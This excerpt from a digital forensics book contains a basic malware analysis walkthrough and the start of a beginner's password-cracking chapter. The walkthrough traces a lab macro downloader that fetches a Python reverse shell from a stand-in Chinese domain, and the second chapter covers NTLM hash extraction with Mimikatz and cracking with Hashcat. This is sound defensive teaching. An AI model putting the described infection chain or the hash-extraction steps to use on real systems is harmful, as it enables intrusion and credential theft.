  • 32. Chapter 2 - Basic Malware Analysis 25 One of my first instances of basic malware analysis was when I was in a situation that required using a computer shared by multiple people to access the internet. I erred on the paranoid side before using it to access any of my personal accounts and ran a network packet capture using Microsoft‘s NetMon, which is a packet capture tool similar to Wireshark. I noticed from the packet capture that the machine was communicating with a Chinese domain which appeared unusual. I then conducted a quick Google search on the domain and found that it was associated with a piece of malware. The site I found listed out additional IOCs which enabled me to check running processes to find that I had the malicious executable running. I was then able to kill the process with Task Manager. I was also able to review the registry with Regedit and delete the registry key that was created by the malware to establish persistence. I was then able to notify the other users of the machine that it had malware running on it that steals information such as account credentials. The machine was then reimaged to ensure all of the malware was removed and the machine was back to a known good state. Next, we will cover some of the basic tools that you can use to perform the same type of simple analysis. Basic Malware Analysis Tools This section covers free tools that can be used for basic malware analysis to identify if a machine has been infected with malware. You can use these tools to extract IOCs to share with the community or to include in an Incident Response report in a professional setting. We will start with built in tools that you probably already know and discuss how to use them for basic malware analysis. Task Manager is a built in Windows tool that allows you to view running processes. You can use it to view running processes and how much resources they are using. On Windows 10, right click the task bar and select Task Manager from the menu to launch the Task Manager. On Windows 11, click the Windows Start Menu icon and type Task Manager to search for the Task Manager app. You may then need to click the drop down arrow entitled More details.
  • 33. Chapter 2 - Basic Malware Analysis 26 You can use this tool to find suspicious processes running on the machine. More sophisticated Malware will attempt to blend in by using the names of common legitimate programs, however, if you have a specific process name from an IOC you can easily look to see if it is running. Each process also has an arrow you can click to expand to show child processes. There are also Startup and Services tabs that allow you to review processes that are set to run on startup and the list of installed services. You can review the Startup tab to help identify simple persistence mechanism of malware to find applications that run on startup that are uncommon or should not be included. This same process can be done on the Services tab to find suspicious services installed on the machine. These tabs show you the same information that you would get by running Startup Apps or services.msc independently from Task Manager.
  • 34. Chapter 2 - Basic Malware Analysis 27
  • 35. Chapter 2 - Basic Malware Analysis 28 You can pull up the details for each service listed in the Services tab or from services.msc. It will list the Startup type which is either Manual, Automatic, or Disabled. The Automatic startup type services will start automatically when the computer boots up Windows. You can also find the path to the executable that the service runs and what user or context it runs under. These details are useful IOCs for malicious services installed by malware.
  • 36. Chapter 2 - Basic Malware Analysis 29 Process Explorer⁵⁹ (procexp.exe and procexp64.exe) from the Sysinternals Suite is another free tool that provides a greater level of detail than the built in Task Manager in Windows. It provides the same functionality to kill processes while providing additional details in the main window. You can submit hashes to VirusTotal through Process Explorer to help determine if a process is malicious. ⁵⁹https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer
  • 37. Chapter 2 - Basic Malware Analysis 30 Right clicking on the process and selecting Check VirusTotal will prompt you to accept submitting hashes of the suspected process to VirusTotal. After selecting yes on the prompt, the VirusTotal box on the image tab will contain a link to the VirusTotal results of the submitted hash. In this case, the legitimate Microsoft Print Spooler executable spoolsv.exe was submitted and resulted in 0 out of 73 Antivirus vendors detecting it as malicious. Process Explorer also has a tab to review TCP/IP connections listing listening addresses and ports or outbound communications made by the process. This helps a malware analyst determine if the process is listening or receiving on any network ports. This can help find IOCs for Command and Control (C2) or even data exfiltration.
  • 38. Chapter 2 - Basic Malware Analysis 31 The Strings tab is another great feature that allows you to list the strings embedded in the binary just like the strings command in Linux. This is useful for finding IOCs and determining some of the capabilities of the malware. You may be able to find IPs or domain names that are coded in to the application. Or you may find strings that point to dangerous Windows API calls that can hint at the executable being malicious. The Sysinternals Suite can be downloaded here⁶⁰. System Informer, formerly Process Hacker, is another great tool that performs similar functions to ⁶⁰https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
  • 39. Chapter 2 - Basic Malware Analysis 32 Task Manager and Process Explorer. It will provide you the same level or process details and group the processes in a parent/child process layout like Process Explorer. Right clicking a process in System Informer allows you to terminate a process just like in Task Manager and Process Explorer. Right clicking and selecting Send to provided an option to send the process executable or dll to VirusTotal similar to Process Explorer. System Informer includes a Modules tab when right clicking and selecting properties on a process. This Modules tab lists all of the modules loaded and in use by the process. This is helpful for finding additional IOCs or identifying malicious dll files used by a suspicious process.
  • 40. Chapter 2 - Basic Malware Analysis 33 System Informer provides Services and Network tabs that offer similar functionality to the features covered under Task Manager and Process Explorer. A malware analyst can use the Services tab to search for suspicious services and review the details of the service. The Network tab can be used to map running processes to active network connections and listening ports. System Informer is available for download at https://github.com/winsiderss/systeminformer.
  • 41. Chapter 2 - Basic Malware Analysis 34
  • 42. Chapter 2 - Basic Malware Analysis 35 Process Monitor⁶¹, or Procmon, is another tool included in the Sysinternals Suite that is useful for monitoring processes. Procmon goes beyond the process information provided by Task Manager, Process Explorer, or System Informer. It details every action taken by the process allowing in-depth analysis of suspicious or malicious processes. Procmon will quickly overload an analyst with data unless filters are used to filter out the noise. It enables an analyst to find IOCs and understand what actions the malware has taken on the system. ⁶¹https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • 43. Chapter 2 - Basic Malware Analysis 36 ProcDOT is useful for filtering and displaying the results from Procmon. ProcDOT allows an analyst to ingest the logs generated from a Procmon capture saved in a CSV file. The analyst can then select the desired process from the imported CSV file and ProcDOT will generate an interactive graph.
  • 44. Chapter 2 - Basic Malware Analysis 37 This effectively filters out the noise of unrelated processes giving the analyst an easy-to-follow graph that displays all actions conducted by the malware to include those of child processes spawned by the original process. It also allows to ingest packet captures to correlate with Procmon. ProcDOT can be downloaded here⁶². The netstat⁶³ tool included in Windows is another useful tool. You can use it to list all listening ports and established connections. You can review the connections and listening ports with the command netstat -ano. This command includes the process ID of the process using that listed port to help you correlate a suspicious connection to a process. ⁶²https://www.procdot.com/downloadprocdotbinaries.htm ⁶³https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat
  • 45. Chapter 2 - Basic Malware Analysis 38 The tasklist⁶⁴ command can be used to list running process and their associated process ID from the command line. This can help you enumerate suspicious processes without needing to use a Graphical User Interface (GUI). It is helpful when used in conjunction with netstat to look up the process ID found with a suspicious network connection. The below screenshot lists that PID 4 listening on port 445 (RPCSMB) on all interfaces (0.0.0.0) is the System process. In this case it is a legitimate process and listening port combination. The System process also always loads at PID for so if it were a PID other than 4 that would be unusual and a potential IOC. ⁶⁴https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist
  • 46. Chapter 2 - Basic Malware Analysis 39 Another way to do the same analysis is to use the TCPView⁶⁵ tool from Sysinternals Suite. The TCPView tool provides the same information received from netstat -ano and tasklist /SVC in a convenient and easy to read GUI. This allows you to quickly identify suspicious listening ports or connections and correlate them to the corresponding process. The remote address listed in TCPView and netstat is another useful IOC to include in your analysis. ⁶⁵https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview
  • 47. Chapter 2 - Basic Malware Analysis 40 Wireshark is a valuable tool to conduct more in-depth packet analysis. Wireshark enables a malware analyst to view all network traffic sent and received on the suspected machine. An analyst can filter the packets by IP, port, protocol, or many other options. Filtering by DNS protocol enables an analyst to find DNS queries to malicious sites used for Command and Control (C2) of malware. The domains found in the DNS queries are useful IOCs to determine if the machine is compromised. Wireshark provides capabilities to conduct more advanced analysis of malware communication. It allows an analyst to identify C2 traffic hidden in protocols such as DNS. It also enables an analyst to extract data such as second stage binaries or infected text documents downloaded by the malware. Using a proxy in combination with Wireshark enables an analyst to export the certificate and keys used to encrypt Transport Layer Security (TLS) encrypted traffic to recover the plaintext data sent between malware and attacker-controlled servers.
  • 48. Chapter 2 - Basic Malware Analysis 41 The malware analysis walkthrough in this chapter will focus on using Wireshark to perform basic analysis tasks. This includes reviewing DNS queries to identify suspicious domain lookups and plaintext commands/passwords sent during malware communication. More advanced usage of Wireshark is out of scope of basic malware analysis and is saved for future writings on intermediate and advanced malware analysis. Wireshark can be downloaded here⁶⁶. Microsoft’s NetMon is an alternative to Wireshark, but is only available for download from archive⁶⁷ and is no longer being developed. Regedit is another useful tool built in to Windows. Regedit gives the ability to view and edit the Windows registry. It can be used for basic malware analysis to search for persistence mechanism such as entries in HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun or HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun. Applications listed in the run keys will auto start when a user logs in to the machine and is sometimes used by malware to establish persistence. ⁶⁶https://www.wireshark.org/ ⁶⁷https://www.microsoft.com/en-us/download/4865
  • 49. Chapter 2 - Basic Malware Analysis 42 Regshot is useful for determining what changes an application makes to the Windows registry when it is executed. Regshot allows an analyst to take a snapshot of the Windows registry before and after executing a suspicious application and generates a comparison of the two snapshots. This is useful when analyzing a suspicious application in a controlled lab setting. Regshot can be downloaded here⁶⁸. However, Regshot is no longer being actively maintained. NirSoft provides an alternative to Regshot that is capable of handling registry comparisons. NirSoft’s RegistryChangesView can be found here⁶⁹. The malware analysis portion of this chapter will still use Regshot. ⁶⁸https://github.com/Seabreg/Regshot ⁶⁹https://www.nirsoft.net/utils/registry_changes_view.html
  • 50. Chapter 2 - Basic Malware Analysis 43 Certutil is another tool built in to Windows that is useful for malware analysis. An analyst can use certutil to generate a hash of a file to compare it to a known malicious file hash. This can indicate if a file is malicious without having to execute it to investigate what it does. An analyst can use the hashes generated by cerutil as IOCs once a suspicious file is determined to be malicious thru analysis.
  • 51. Chapter 2 - Basic Malware Analysis 44 Certutil⁷⁰ is used in the above screenshot to generate the SHA1, MD5, and SHA256 hashes of cmd.exe. A malware analyst can compare these hashes to the hashes of the known legitimate versions of cmd.exe installed with Windows. The analyst can also submit these hashes to VirusTotal to see if it is a known malicious file. An analyst can also use automated tools for analysis. Multiple tools mentioned already have features to upload files or hashes to VirusTotal. A suspicious file can be uploaded to VirusTotal⁷¹. VirusTotal is an online system that will execute the file in a sandbox to attempt to determine if it is malicious or not. It will then provide file hashes and IOCs an analyst can use to identify the file. VirusTotal also shares uploaded files with Antivirus vendors to use for building detection signature. ⁷⁰https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil ⁷¹https://www.virustotal.com/gui/home/upload
  • 52. Chapter 2 - Basic Malware Analysis 45 Antiscan.me⁷² is another option an analyst can use to analyze a suspected file. Antiscan.me only checks uploaded files against 26 different Antivirus vendors. It also does not share the files with the Antivirus vendors. This makes it a good option if you are analyzing a file that you do not want to be shared with other organizations. ⁷²https://antiscan.me/
  • 53. Chapter 2 - Basic Malware Analysis 46 Basic Malware Analysis Walkthrough It is time to do a walkthrough of a sample malware analysis now that you are familiar with some of the tools used for malware analysis and their capabilities. The walkthrough will teach how to use some of the tools mentioned in this chapter. It will not use any tools not previously mentioned. In this scenario a user has reported to you that their machine has been running slow and acting “weird”. You have already conducted initial investigations by asking the user questions including:
  • 54. Chapter 2 - Basic Malware Analysis 47 “When did the issues start?”, “Did you download or install any new applications?” and “Did you click any links or open any documents from untrusted sources?” The user states that they did not install any application recently but did review a Microsoft Word document sent from a customer. We start our analysis with opening TCPView from the Sysinternals Suite to determine if we can quickly find any unusual processes communicating to remote sites. In this simple scenario, we find that there is currently only one process, python.exe, communicating to a remote system. We flag this as suspicious since Python is not typically used in the manner for our fictitious network. We then make a note of the port and IP for potential IOCs. We can verify this using the other tools covered early as well. Netstat -ano lists an established connection between our test machine and the simulated attacker machine with local IP/port 192.168.163.131:63590 and remote IP/port 192.168.163.128:8443 from the process with PID 6440. Tasklist /SVC lists that python.exe is running as PID 6440.
  • 55. Chapter 2 - Basic Malware Analysis 48 Process Explorer can also be used to verify the findings. Right clicking on python.exe, selecting Properties, and then selecting the TCP/IP tab lists the connection to 192.168.163.128:8443. System Informer provides another easy means to find the unusual connection and correlate it to the python.exe process by selecting the Network tab.
  • 56. Chapter 2 - Basic Malware Analysis 49
  • 57. Chapter 2 - Basic Malware Analysis 50 We have verified that there is unusual network traffic on the potentially compromised machine and need to dig deeper into the traffic. We then open up Wireshark to review a packet capture of the incident. We use the IP and port combination (ip.addr == 192.168.163.128 and tcp.port == 8443) to filter the traffic down to the currently interesting packets. The traffic is not encrypted which will allow us to extract plaintext communications.
  • 58. Chapter 2 - Basic Malware Analysis 51 We then right click on one of the packets and select follow TCP stream to pull up the conversation in a readable format. This confirms that this is a malicious process used to create a reverse shell to the attacker. We are able to identify commands sent by the attacker and the response from the infected machine.
  • 59. Chapter 2 - Basic Malware Analysis 52 The attacker ran a series of command to enumerate identifying information about the machine and what privileges the user account has. The attacker then attempts to establish persistence by creating a service named NotBackDoor to auto start the malware containing the reverse shell. This action failed leading the attacker to then attempt persistence by creating a run key in the system registry for the current user and was successful.
  • 60. Chapter 2 - Basic Malware Analysis 53 At this point we have verified that there is malware present on the system and it is actively being exploited by a remote attacker. We immediately take action to isolate the machine to cut off access from the attacker and protect the rest of the network. In this scenario we would just simply block the IP and port on the perimeter firewall and remove the infected machine from the network before continuing our analysis. We then take steps to confirm the persistence measures taken by the attacker. We review the services in services.msc to verify that NotBackDoor service was not successfully created. Then we take a look to ensure no other unusual service exist. The NotBackDoor service name and the binPath option of C:Python27python.exe C:WindowsTasksbdw.py are still noted as IOCs since the attacker did attempt to create the service and it could be present on other infected machines if access was granted.
  • 61. Chapter 2 - Basic Malware Analysis 54 Regedit is then used to verify the run key created after verifying that no malicious services exist. We do find a NotBackDoor key that points to C:Python27python.exe C:WindowsTasksbdw.py. We make note of this as an IOC. We also note that C:WindowsTasks is commonly used as a location to drop malware due to low privilege users being able to write to the location and is common excluded from protections such as application whitelisting since it is located under C:Windows.
  • 62. Chapter 2 - Basic Malware Analysis 55 The next step for this scenario is to navigate to the C:WindowsTasks folder to investigate the bdw.py file mentioned in the previous steps. The investigation finds that this is just a simple Python script to establish a reverse shell from the infected computer to the attacker’s machine. We are able to determine that it contains the port number 8443 but it is pointing to a domain name of maliciousdomain.cn instead of IP.
  • 63. Chapter 2 - Basic Malware Analysis 56 We add this domain to the list of IOCs. We could have also identified the traffic associated with this domain if we had started this investigation by looking for suspicious DNS calls. The .cn root domain indicates this is a Chinese domain and if we are in a scenario where traffic to China is abnormal then this is a potential red flag.
  • 64. Chapter 2 - Basic Malware Analysis 57 We know that bdw.py is malicious and provided a remote attacker access to the infected machine, but we do not yet know how it got there. We see that the document the user stated they received from a new customer ends with the extension .docm. This informs us that the document contains macros which could be the initial infection vector (IIV). Analysis on this file needs to be done in an isolated lab to prevent any reinfection. The document in this scenario contains only one line of text stating that it is a generic document for a malware analysis walkthrough. We could search for unique strings in the document that could be used for IOCs in a real-world scenario to help others determine if they have received the same document. The next step is to check the documents for macros. Click View in the ribbon menu at the top of the document. Then select the Macros button and click the Edit button in the window that pops up. We find that this document does contain a simple macro that uses PowerShell to download bdw.py from maliciousdomain.cn. The macro then executes bdw.py to initiate the initial reverse shell connection. The macro contains the AutoOpen and Document_Open subroutines to run the downloader when the document is opened. We have now verified that Doc1.docm is a downloader used to infect the system with a Python-based reverse shell. We add Doc1.docm to our list of IOCs.
  • 65. Chapter 2 - Basic Malware Analysis 58 We could have started our analysis with the Doc1.docm document that was mentioned by the user. This would have given us the info to track down the reverse shell that we had found by analyzing the network traffic and processes earlier. Running Wireshark while executing the macro helps us find the DNS calls to the maliciousdomain.cn. We can also extract the bdw.py script from the HTTP stream since it was download unencrypted via HTTP. This can be useful in instances were more advanced malware downloads another stager and then deletes the stager from the system after running its payload.
  • 66. Chapter 2 - Basic Malware Analysis 59 We can also use the built in certutil.exe tool to generate hashes for the malware files to use for IOCs. Run certutil -hashfile Dco1.docm SHA256 to generate a SHA256 hash of the document. You can also generate an MD5 hash and generate the hashes for the bdw.py. These are useful IOCs for signature-based systems to detect the presence of the malware.
  • 67. Chapter 2 - Basic Malware Analysis 60 We can use Procmon and ProcDOT to verify that the malicious files did not spawn any additional processes that need to be investigated. The ProcDOT graph shows us that the python.exe process communicated over TCP to IP 192.168.163.128 and spawned a cmd.exe process. We can see the commands that were run in the cmd.exe process in the graph and verify that no additional files or processes were created. We can verify if any other registry settings are changed by executing the Word document macro on our test machine. We use Regshot to take a snapshot before and after opening the document. We then open the comparison of the snapshots to review the changes. Start Regshot then click 1st shot and then shot.
  • 68. Chapter 2 - Basic Malware Analysis 61 We then open the malicious Word document. We execute the macro allowing it to download the bdw.py reverse shell from out attacker webserver and then add our persistence registry key under HKCUSoftwareMicrosoftWindowsCurrentVersionRun. Then we click 2ⁿ shot in Regshot and select shot. This takes the second snapshot and allows us to click the compare button to compare the snapshots. This produces a .txt document listing all of the registry changes that occurred between the snapshots. It contains a lot of noise and can be tedious to sort through. We can verify that the
  • 69. Chapter 2 - Basic Malware Analysis 62 persistence mechanism was added. We can find evidence that the user clicked the Enable Content button allowing the macro to run. This found by searching for TrustRecords to find an entry that lists the malicious document added to the TrustRecords key. We can include automated analysis by uploading the document to VirusTotal to determine if it is detected as malicious by any of the Antivirus vendors. VirusTotal lists 30 out of 62 vendors detected the document as malicious with most of the detections flagging it as a downloader. This matches what we determined from our own analysis.
  • 70. Chapter 2 - Basic Malware Analysis 63 Analysis Wrap-Up We have now completed analyzing the system to verify that it is infected with malware. We determined what the malware does and we have extracted IOCs to implement in our defensive tools to detect future infection attempts. The machine will need to be reimaged before returning it to the user for use to ensure all malware has been eradicated. It is important to ensure a forensic image is taken before reimaging the system if evidence preservation is needed to legal cases or future investigations. To recap our IOCs: • Downloader macro in document title Doc1.docm • Unique string “This is a generic document for a malware analysis walkthrough” in Doc1.docm • Second stage Python reverse shell named bdw.py stored in C:WindowsTasks • Service named NotBackDoor to auto start bdw.py
  • 71. Chapter 2 - Basic Malware Analysis 64 • HKCUSOFTWAREMicrosoftWindowsCurrentVersionRunNotBackDoor registry key to autorun bdw.py • SHA256 hash of Doc1.docm - 6fa2281fb38be1ccf006ade3bf210772821159193e38c940af4cf54fa5aaae78 • Md5 hash of Doc1.docm - b85e666497ea8e8a44b87bda924c254e • SHA256 hash of bdw.py - f24721812d8ad3b72bd24792875a527740e0261c67c03fe3481be642f8a4f980 • Md5 hash of bdw.py - 34ca38da117d1bb4384141e44f5502de • Bdw.py downloaded from maliciousdomain.cn • Bdw.py reverse shell to IP 192.168.163.128 (maliciousdomain.cn) • Bdw.py reverse shell on port 8443
  • 72. Chapter 2 - Basic Malware Analysis 65 Conclusion This was a simple example of how to conduct basic malware analysis. The tools and techniques discussed in this scenario can be used in a real-world scenario to determine if a machine is infected with malware and extract some IOCs. The malicious files used for this scenario and a copy of the walkthrough can be found on my GitHub⁷³. You will need a system with netcat to receive the reverse shell as well as fakedns⁷⁴ to simulate a DNS server to direct the malicousdomain.cn calls to your attacker machine. More advanced malware will require additional tools and techniques. The techniques to reverse engineer malware to include decompiling, disassembling, and debugging is covered in courses such as SANS FOR610 Reverse Engineering Malware⁷⁵. The FOR610 course is a good step up to the next level if you enjoyed this basic malware analysis. The course also teaches some techniques for deobfuscating code whereas this basic analysis only consisted of unobfuscated code. Additional advanced topics to look into include techniques to recover encryption keys. Those techniques are useful to decrypt source code of encrypted malware or to help recover keys to decrypt files that have been encrypted by ransomware. Assembly language programming familiarity is needed for debugging and reverse engineering of malware. Basic knowledge of JavaScript is also useful for analyzing web-based malware. You can also increase your skills by taking malware development course from Sektor7⁷⁶. Learning to develop malware will help you better understand how to detect malware and will teach you additional techniques used by modern malware. SANS also offers the advanced FOR710 course for Reverse-Engineering Malware: Advanced Code Analysis⁷⁷. If you enjoyed this walkthrough and would like to check out more, you can check out my GitHub⁷⁸ for a walkthrough on performing white box code analysis of a vulnerable web application and coding a full chain exploit. I have solutions for various vulnerable web applications and binary exploitation challenges and will be adding a couple of binary exploitation and reverse engineering walkthroughs in the future. I can also add in intermediate malware analysis walkthroughs if there is enough interest. ⁷³https://github.com/ApexPredator-InfoSec/Basic-Malware-Analysis ⁷⁴https://github.com/SocialExploits/fakedns/blob/main/fakedns.py ⁷⁵https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/ ⁷⁶https://institute.sektor7.net/red-team-operator-malware-development-essentials ⁷⁷https://www.sans.org/cyber-security-courses/reverse-engineering-malware-advanced-code-analysis/ ⁷⁸https://github.com/ApexPredator-InfoSec
  • 73. Chapter 3 - Password Cracking for Beginners By John Haynes⁷⁹ | GitHub⁸⁰ | Discord⁸¹ Disclaimer & Overview This chapter is a beginner’s guide on how to crack passwords. While on the surface this may seem to be something reserved for cybercriminals, there are legitimate reasons for a law-abiding individual to understand this process. Firstly, those who work in penetration testing or a red team environment will need to know how to do this task. Secondly, law enforcement may need to access data that is password protected with the legal authority of a search warrant. Third, important data may need to be recovered from a device after the owner is deceased for the estate or heirs. There may also be other ways to legally access password-protected data such as forgotten passwords or security concerns in a corporate environment. Finally, it is important for someone who wishes to keep their data secure to understand this process to know why a strong password is important and how to test the security of their passwords without compromising those passwords. That being said, I do not condone, encourage, or support those who would use this information for malicious or illegal means. This chapter will start with the fundamentals of hashing and end with showing how a strong password makes a substantial difference when attempting to crack complex passwords. I will also touch on more advanced concepts for custom wordlist generation and optimization. ⁷⁹https://www.youtube.com/channel/UCJVXolxwB4x3EsBAzSACCTg ⁸⁰https://github.com/FullTang ⁸¹http://discordapp.com/users/167135713006059520
  • 74. Chapter 3 - Password Cracking for Beginners 67 In digital forensics, the first challenge is to get the data in a state so that it can be analyzed. For those that need to legally access the data, there should be something in here for you. For those that wish to learn how to better secure their data, there should be something in here for you as well. Let’s get started! Password Hashes At the fundamental level, a password is like a key that fits into and unlocks a particular lock. Only you have the key, but anyone can come up and inspect the lock. With a mechanical lock, nobody can see the internal functions of the lock without specialized tools like lock picks. If someone was proficient at using lockpicks, they could theoretically determine the depth of each pin while picking the lock to make a key that would unlock the lock. The same sort of concept is true for passwords. Each password should have a unique algorithmic hash. To obtain a hash, a complex mathematical algorithm is run against a string of data and the output is an extremely unique character string. For some weaker hash algorithms, there have been hash collisions where two different sets of data have resulted in the same outputted hash. However, when considering human-generated passwords, it is normally not necessary to worry about hash collisions. It is sufficient to say that if you have the hash of a password you have the password in an encrypted state. The password hash is how the password is stored on any modern operating system like Windows, macOS, or Linux or for encrypted containers like BitLocker or encrypted 7-Zip files. With the right tools, that is the only part of the password that will be available for an examiner to inspect, just like the mechanical part of a lock is the only thing to inspect on a locked door if someone were to try and pick the lock. There are methods to prevent the extraction of a password hash, but it is reasonable to attempt to find a method to extract a hash from a system if the individual has physical access to the electronic device, encrypted file, or a forensic image (.E01, dd, or similar) of an encrypted volume or file. Therefore, if the password hash can be extracted, it can be attacked to attempt to crack the password. Hashing algorithms are mathematically a one-way operation. If someone has a password hash, there is no normal mathematical operation that can be performed to reverse engineer the original plaintext password. Additionally, some hashing algorithms are more difficult to crack than others because the speed of decryption is sacrificed for security. However, the user can guess the potential password, hash it, and then compare the resulting hash against the known hash. If it is a match, then the password is cracked. This would be a very slow method to do manually, but there is software like Hashcat that can be used to automate this process to perform thousands of attempts per second. To make the guessing more difficult, the system can implement what is known as “salt” into the hash to obfuscate the hash and make it more difficult to crack. A discussion of password hashes would not be complete without mentioning salted passwords. The salt for a password is additional data that is added to the password before the hash algorithm is applied to complicate the guessing of the password. Therefore, the salt would have to be known and applied to each potential guess otherwise the hash would be incorrect even if the correct password was guessed. The salt can be generated in several different ways and can be static or dynamic
  • 75. Chapter 3 - Password Cracking for Beginners 68 depending on developer choice. Unfortunately, Windows does not salt the NTLM password hashes that it generates so they are vulnerable to attack. As was just mentioned, Windows stores password hashes in NTLM format. This is unfortunately a very weak form of encryption as it is the equivalent of MD4 encryption. The VTech company was compromised in 2015 by a SQL injection attack and when the password hashes were analyzed they were determined to be encrypted with MD5. MD5 is considered to be a weak form of encryption and some do not consider it to even be encryption as it is so weak. Windows uses even weaker encryption for its passwords, and those passwords are not even salted to compensate for the weak encryption! Windows has upgraded to NTLMv1 and NTLMv2 for some uses, but those are still weak by most encryption standards. Even more concerning is these NTLM hashes of user passwords are transmitted over the network for authentication between computers (Patton, 2022). This is one of the most common passwords that users will use and can be extracted by several methods, including packet sniffing. It is also nearly guaranteed to not be generated by a password manager as the user has to physically enter the password into the keyboard. Useful Software Tools There is no reason to reinvent the wheel as in most situations someone else has already created a tool that will perform the task needed. The same is true for using software to assist in cracking passwords. The general workflow for cracking a password is hash extraction, hash identification, attacking the hash with general methods, and attacking the hash with custom methods. Tools that can assist in these phases are Mimikatz⁸², Hashcat⁸³, John the Ripper⁸⁴, Passware⁸⁵, Gov Crack⁸⁶, custom scripts often shared on GitHub and many more. Some tools like Passware are paid tools, and while there is nothing wrong with a paid tool, this paper will focus on using the free tool called Hashcat. Gov Crack has a graphical user interface (GUI) while Hashcat and John the Ripper use command-line interfaces (CLI). Normally GUI interfaces allow for ease of access but tend to lack the flexibility of CLI tools. Nearly all of the custom scripts that are used for hash extraction and are posted on GitHub are going to be CLI-based tools. If the reader is unfamiliar with the command line, that should not be a limiting factor for at least understanding the methods discussed in this paper and there will be step-by-step instructions on how to crack a password hash in Hashcat. The focus on a particular set of tools over another is due to personal experience with certain tools and no bias towards any particular tool is intended as many tools can do the same thing and overlap with each other with certain functions. ⁸²https://github.com/gentilkiwi/mimikatz ⁸³https://hashcat.net/hashcat/ ⁸⁴https://github.com/openwall/john ⁸⁵https://www.passware.com/ ⁸⁶https://www.govcrack.com/
  • 76. Chapter 3 - Password Cracking for Beginners 69 Hash Extraction Techniques One common method to extract an NTLM hash is to use Mimikatz, but it is widely recognized as malware by most anti-virus software. If the individual has access to the forensic image (an .E01 or similar) of the hard drive of the computer, then Mimikatz should be used against the SAM and SYSTEM registry files found in C:WindowsSystem32config, assuming BitLocker or another form of encryption is not present. Even with live access to a machine, administrator rights and a forensic tool such as FTK Imager⁸⁷, preferably preloaded on a USB drive, will be required to copy the registry files as a simple copy/paste or drag-and-drop method will not work. This is just one way to obtain an NTLM hash as it can also be obtained by observing network traffic. In general, this is a great place to start when trying to crack passwords and try out different methods as the NTLM hash uses a weak encryption method. If the examiner is looking at an APFS encrypted volume from a MacBook, it is important to realize that the password for the encrypted volume is the same as the password used to log into the system. However, this hash uses a strong encryption method and will take much longer to crack as compared to an NTLM hash. To extract the hash, there are tools available like the one from user Banaanhangwagen⁸⁸ on GitHub. This will require using Linux to run the tool and extract the hash from a raw or .dd forensic image. Other encryption methods include BitLocker, zipped or compressed files, password-protected Word documents, and many more. Generally speaking, some smart person somewhere has found out how to extract the hash and has shared that information for that particular situation. The examiner needs to search for hash extraction of a particular make, model, file system, software version, or a combination of those and similar attributes. John the Ripper⁸⁹ is a great place to start when looking for how to extract a hash. Also as a general rule, the hash is likely to be stored in plain text somewhere in the hex (the raw data) on an electronic device. If the examiner is willing to poke around and search the hex, they may be able to find the password hash assuming the correct decoding method is used. This is not a hard-fast rule by any means, as there are complex methods of preventing external access to protected memory areas. For example, at the time of writing this, I know of no known method to extract a hash from a Chromebook even though it is possible to log into a Chromebook without it being connected to the internet, implying that a hash of the user’s password must be stored locally on the device. ⁸⁷https://www.exterro.com/ftk-imager ⁸⁸https://github.com/Banaanhangwagen/apfs2hashcat ⁸⁹https://github.com/openwall/john
  • 77. Chapter 3 - Password Cracking for Beginners 70 Hash Identification There may be times when a password hash has been located but the hash type is unknown. Hashcat has an entire wiki including example hashes that can aid in this process. The example hashes are located on the Hashcat Wiki⁹⁰ and can help with the hash identification of an unknown hash. A simple Google search for “Hash Identification” results in multiple online tools that can help identify the type of hash, be it NTLM, SHA-256, or many others. Several websites include Skerritt⁹¹, Hashes.com⁹² or Onlinehashcrack.com⁹³. Be wary of using these or any other websites for sensitive hashes as the website now has the actual hash. For advanced examiners who do not want to use an online tool, Kali Linux also has an offline tool called Hash-Identifier⁹⁴ that can be downloaded and used locally so the hash is not shared. Attacking the Hash Once the type of hash is identified, it is time to attempt to crack the hash. The simplest yet least secure method of cracking a password from a hash is once again to use an online resource. Some of the previously mentioned websites also offer services that will attempt to crack a hash, but those are limited. The use of a password cracking tool such as Hashcat is highly recommended as it allows for a much more powerful, robust, and secure method of cracking a password hash. Here is a hash taken from the Hashcat Wiki: b4b9b02e6f09a9bd760f388b67351e2b. This is an NTLM hash of a word in the English language. If you have visited the website then it is easy to determine what this hash is, but let’s assume that we know nothing about this hash other than it was extracted from a Windows machine and we wanted to crack this hash using Hashcat. Recall that the method of cracking this password has to be coming up with our potential password, hashing it, and comparing the two hashes until we find a match. This is a process Hashcat will automate for us. So if we get it wrong, the worst that will happen is we will move on to the next potential password and try again. Therefore, there are two primary methods of attacking a password, a brute-force method, and a more focused attack. An exhaustive brute-force attack would take the combination of all possible symbols on the keyboard and iterate through them. This is not ideal, but let’s explore the mathematical reason why it is not the best method before explaining a better method. If an exhaustive attack was to be performed against a password, that would mean that every possible permutation of all possible characters, numbers, and symbols on the keyboard would be attempted. For the standard English QWERTY keyboard, there are 10 digits 0123456789, 26 lowercase letters abcdefghijklmnopqrstuvwxyz, 26 upper case letters, ABCDEFGHIJKLMNOPQRSTUVWXYZ, and 33 special characters or including symbols, !@#$%^&*()-_=+[{]}|;:'",<.>/? . Note that space or the spacebar is also included in the special character count. Adding these together results in 10 + 26 + 26 + 33 = 95 ⁹⁰https://hashcat.net/wiki/doku.php?id=example_hashes ⁹¹https://nth.skerritt.blog/ 